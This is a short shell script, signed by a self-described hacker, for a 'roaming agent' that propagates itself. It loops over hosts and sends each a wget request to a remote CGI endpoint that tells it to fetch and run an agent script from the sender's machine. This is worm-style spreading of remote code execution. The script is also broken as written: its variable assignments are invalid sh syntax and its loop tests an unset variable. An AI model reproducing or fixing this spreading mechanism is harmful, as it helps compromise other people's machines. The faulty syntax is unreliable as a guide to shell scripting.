#!/bin/sh
# 
# A SMALL LINUX /bin/sh HTTP ROAMING AGENT SCRIPT.
#
# HACKER: SKUMMY
# DATE: 12/3/2009
#
#

${ME}=`hostname`
${YOU}=./get_host

while ${YOU};
do
   wget "http://${YOU}/cgi-bin/run_agent.cgi?agent=http://${ME}/http_agent.sh"

   ${YOU}=./get_host
done
